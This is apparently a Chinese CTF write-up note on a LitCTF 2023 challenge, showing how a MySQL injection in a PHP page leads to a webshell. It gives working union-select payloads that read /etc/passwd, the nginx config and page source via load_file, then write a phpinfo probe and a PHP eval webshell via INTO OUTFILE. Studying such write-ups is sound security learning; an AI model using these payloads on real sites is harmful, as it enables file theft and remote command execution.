目录

  1. 1. 前言
  2. 2. 原理
  3. 3. 条件
  4. 4. 操作

LOADING

第一次加载文章图片可能会花费较长时间

要不挂个梯子试试?(x

加载过慢请开启缓存 浏览器默认开启

MySQL注入实现getshell

2023/5/23 Web Sql
字数统计: 1k字   |   阅读时长: 5分   |   总文章阅读量:

前言

看到[LitCTF 2023]这是什么?SQL !注一下 !这题的wp中出现了这种解法,顺手记下来

原理

使用 MySQL 中的outfile方法,构造 sql 语句写入webshell,通过参数执行系统命令

条件

  • 具有目录写权限
  • 知道网站根目录绝对路径
  • secure_file_priv为空或指定目录在网站目录下
  • php gpc 关闭

操作

题目sql语句

<?php
$sql = "SELECT username,password FROM users WHERE id = ".'(((((('.$_GET["id"].'))))))';
$result = $conn->query($sql);
  1. 常规注入读文件(题目是闭合)
?id=-1)))))) union select load_file('/etc/passwd'),2%23

返回/etc/passwd的文件内容

root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
www-data:x:82:82:Linux User,,,:/home/www-data:/sbin/nologin
mysql:x:100:101:mysql:/var/lib/mysql:/sbin/nologin
nginx:x:101:102:nginx:/var/lib/nginx:/sbin/nologin
  1. 读取nginx配置文件,寻找网站根目录
?id=-1)))))) union select load_file('/etc/nginx/nginx.conf'),2%23

返回

Array ( [0] => Array ( [username] => daemon off; worker_processes auto; error_log /var/log/nginx/error.log warn; events { worker_connections 1024; } http { include /etc/nginx/mime.types; default_type application/octet-stream; sendfile on; keepalive_timeout 65; server { listen 80; server_name localhost; root /var/www/html; index index.php; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; location / { try_files $uri $uri/ /index.php?$args; } location ~ \.php$ { try_files $uri =404; fastcgi_pass 127.0.0.1:9000; fastcgi_index index.php; include fastcgi_params; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; } } } [password] => 2 ) )

  1. 读取首页

    ?id=-1)))))) union select load_file('/var/www/html/index.php'),2%23

返回

Array
(
   [0] => Array
	   (
		   [username] => <?php
   error_reporting(0);
 include "connect.php";
?>
<!DOCTYPE html>
<html>
<head>
   <meta charset="utf-8">
   <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">
   <title>狠狠的注入涅~</title>
   <link rel="stylesheet" href="assets/bootstrap/css/bootstrap.min.css">
   <link rel="stylesheet"
	   href="https://fonts.googleapis.com/css?family=Lato:300,400,700,300italic,400italic,700italic&amp;display=swap">
</head>
<body>
   <header class="text-center text-white masthead"
	   style="background:url('https://www.dmoe.cc/random.php')no-repeat center center;background-size:cover;">
	   <div class="overlay"></div>
	   <div class="container">
		   <div class="row">
			   <div class="col-xl-9 mx-auto position-relative">
				   <h1 class="mb-5">Search what you want to search</h1>
			   </div>
			   <div class="col-md-10 col-lg-8 col-xl-7 mx-auto position-relative">
				   <form method="get" action="">
					   <div class="row">
						   <div class="col-12 col-md-9 mb-2 mb-md-0">
							   <input class="form-control form-control-lg" type="text" name="id"
								   placeholder="Enter your id to start">
						   </div>
						   <div class="col-12 col-md-3">
							   <button class="btn btn-primary btn-lg" type="submit">姨妈大!</button>
						   </div>
					   </div>
				   </form>
			   </div>
		   </div>
	   </div>
   </header>
<section class="text-center bg-light features-icons">
   <div class="container">
	   <div class="row">
		   <div class="col-md-6"> 
			   <h5>Key Source</h5>
			   <pre><?php highlight_file(source) ?></pre>
		   </div>
		   <div class="col-md-6"> 
			   <?php
			   
			   $sql = "SELECT username,password FROM users WHERE id = ".'(((((('.$_GET["id"].'))))))';
			   echo "<h5>Executed Operations:</h5>"
				   .$sql
				   ."<br><br>";
			   $result = $conn->query($sql);
			   if ($result->num_rows > 0) {
					   print_r(mysqli_fetch_all($result, MYSQLI_ASSOC));
			   } else {
				   echo "0 results";
			   }
			   ?>
		   </div>
	   </div>
   </div>
</section>
   <section class="showcase">
	   <div class="container-fluid p-0">
		   <div class="row g-0"></div>
	   </div>
   </section>
   <script src="assets/bootstrap/js/bootstrap.min.js"></script>
</body>
</html>
		   [password] => 2
	   )
)
  1. 写入php探针
?id=-1)))))) union select '<?php phpinfo();?>',2 into outfile '/var/www/html/info.php'%23

访问对应url/info.php,若出现phpinfo环境页面则证明写入成功

  1. 写入webshell
?id=-1)))))) union select '<?php eval($_POST["cmd"]);?>',2 into outfile '/var/www/html/shell.php'%23

蚁剑连接对应url/shell.php即可,密码cmd